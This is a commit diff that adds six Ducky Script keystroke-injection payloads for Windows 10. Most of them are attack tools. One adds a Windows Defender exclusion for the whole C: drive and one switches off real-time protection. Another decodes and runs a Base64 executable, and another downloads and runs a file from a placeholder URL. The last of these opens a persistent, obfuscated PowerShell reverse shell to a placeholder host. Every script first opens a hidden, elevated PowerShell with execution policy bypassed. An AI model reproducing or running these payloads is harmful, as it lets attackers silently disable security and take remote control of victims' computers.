Add files via upload
This commit is contained in:
beigeworm
@@ -0,0 +1,23 @@
|
||||
REM Title: Add Exclusion C-drive
|
||||
REM Author: @beigeworm
|
||||
REM Description: Uses Powershell to add an exclusion to Windows Defender to ingore any files within C:/
|
||||
REM Target: Windows 10
|
||||
|
||||
REM some setup for dukie script.
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
REM open powershell (remove -W Hidden to show the window).
|
||||
GUI r
|
||||
DELAY 750
|
||||
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 1500
|
||||
ALT y
|
||||
DELAY 5000
|
||||
|
||||
REM add the exclusion path.
|
||||
STRING Add-MpPreference -ExclusionPath C:/
|
||||
ENTER
|
||||
DELAY 250
|
||||
STRING exit
|
||||
ENTER
|
||||
@@ -0,0 +1,30 @@
|
||||
REM Title: Base64 Decode & Execute
|
||||
REM Author: @beigeworm
|
||||
REM Description: Uses Powershell to decode a Base64 string and then execute the file.
|
||||
REM Target: Windows 10
|
||||
|
||||
REM *SETUP*
|
||||
REM replace all placeholders throughout the script.
|
||||
|
||||
REM some setup for dukie script
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
REM open powershell (remove -W Hidden to show the window)
|
||||
GUI r
|
||||
DELAY 750
|
||||
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 1500
|
||||
ALT y
|
||||
DELAY 5000
|
||||
|
||||
REM *replace this below*
|
||||
STRING $b64 = 'YOUR_BASE64_STRING_HERE_IN_SINGLE_QUOTES';
|
||||
|
||||
STRING $decodedFile = [System.Convert]::FromBase64String($b64);
|
||||
|
||||
|
||||
REM *replace NAME_HERE and desired filetype (example is .exe)*
|
||||
STRING $File = "NAME_HERE"+".exe";
|
||||
|
||||
STRING Set-Content -Path $File -Value $decodedFile -Encoding Byte;& $File
|
||||
@@ -0,0 +1,30 @@
|
||||
REM Title: Disable Real-Time Protection
|
||||
REM Author: @beigeworm
|
||||
REM Description: Manually opens Windows Security window and turns offf Real-Time Protection.
|
||||
REM Target: Windows 10
|
||||
|
||||
|
||||
REM some setup for dukie script.
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
REM open Windows Security GUI.
|
||||
GUI r
|
||||
DELAY 1500
|
||||
STRING windowsdefender://
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
REM run through option list and turn RT-protection off.
|
||||
ENTER
|
||||
TAB
|
||||
TAB
|
||||
TAB
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 200
|
||||
SPACE
|
||||
DELAY 300
|
||||
ALT y
|
||||
DELAY 400
|
||||
ALT F4
|
||||
|
||||
@@ -0,0 +1,23 @@
|
||||
REM Title: Download-Execute from Run Prompt
|
||||
REM Author: @beigeworm
|
||||
REM Description: Uses the Run Prompt to download a file and run it.
|
||||
REM Target: Windows 10
|
||||
|
||||
REM *SETUP*
|
||||
REM replace FILE_URL_HERE with the url of your file to run.
|
||||
|
||||
REM some setup for dukie script.
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
REM open powershell (remove -W Hidden to show the window).
|
||||
GUI r
|
||||
DELAY 750
|
||||
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:\;Start-Sleep 1;
|
||||
|
||||
REM replace FILE_URL_HERE below.
|
||||
STRING iwr -Uri FILE_URL_HERE -OutFile upl.exe;Start-Sleep 1;Start upl.exe;exit
|
||||
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 1500
|
||||
ALT y
|
||||
DELAY 5000
|
||||
@@ -0,0 +1,30 @@
|
||||
REM Title: Set System Language
|
||||
REM Author: @beigeworm
|
||||
REM Description: Uses Powershell to set the Windows system lanuage (exame is UK-US).
|
||||
REM Target: Windows 10
|
||||
|
||||
REM some setup for dukie script
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
REM open powershell (remove -W Hidden to show the window)
|
||||
GUI r
|
||||
DELAY 750
|
||||
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 1500
|
||||
ALT y
|
||||
DELAY 5000
|
||||
|
||||
REM set system language to (example here is US)
|
||||
STRING Dism /online /Get-Intl
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING Set-WinSystemLocale en-US
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING Set-WinUserLanguageList en-US -force
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING exit
|
||||
ENTER
|
||||
|
||||
@@ -0,0 +1,28 @@
|
||||
REM Title: Simple NetCat Client
|
||||
REM Author: @beigeworm
|
||||
REM Description: Uses Powershell to start a Netcat client that stays open until the system is restarted.
|
||||
REM Target: Windows 10
|
||||
|
||||
REM *REQUIREMENTS*
|
||||
REM start a netcat listener on server machine using port 4444 (eg. nc -lvp 4444).
|
||||
|
||||
REM *SETUP*
|
||||
REM replace YOUR_IP_OR_DOMAIN_HERE with ncat server address.
|
||||
|
||||
REM some setup for dukie script.
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
REM open powershell (remove -W Hidden to show the window).
|
||||
GUI r
|
||||
DELAY 750
|
||||
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 1500
|
||||
ALT y
|
||||
DELAY 5000
|
||||
|
||||
REM write out the main Powershell code.
|
||||
STRING do{;$v = 4;$a = New-Object SyStem.NeT.sockeTs.TCPClieNt("YOUR_IP_OR_DOMAIN_HERE",4444)
|
||||
STRING ;$b = $a.GetStream();[byte[]]$c = 0..65535|%{0};while(($d = $b.Read($c, 0, $c.Length)) -ne 0){;$e = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($c,0, $d)
|
||||
STRING ;$f = (iex $e 2>&1 | Out-String );$g = $f + (pwd).Path + '> ';$h = ([text.encoding]::ASCII).GetBytes($g);$b.Write($h,0,$h.Length);$b.Flush()};$a.Close();Sleep 10}while ($v -le 5)
|
||||
ENTER
|
||||
Reference in New Issue
Block a user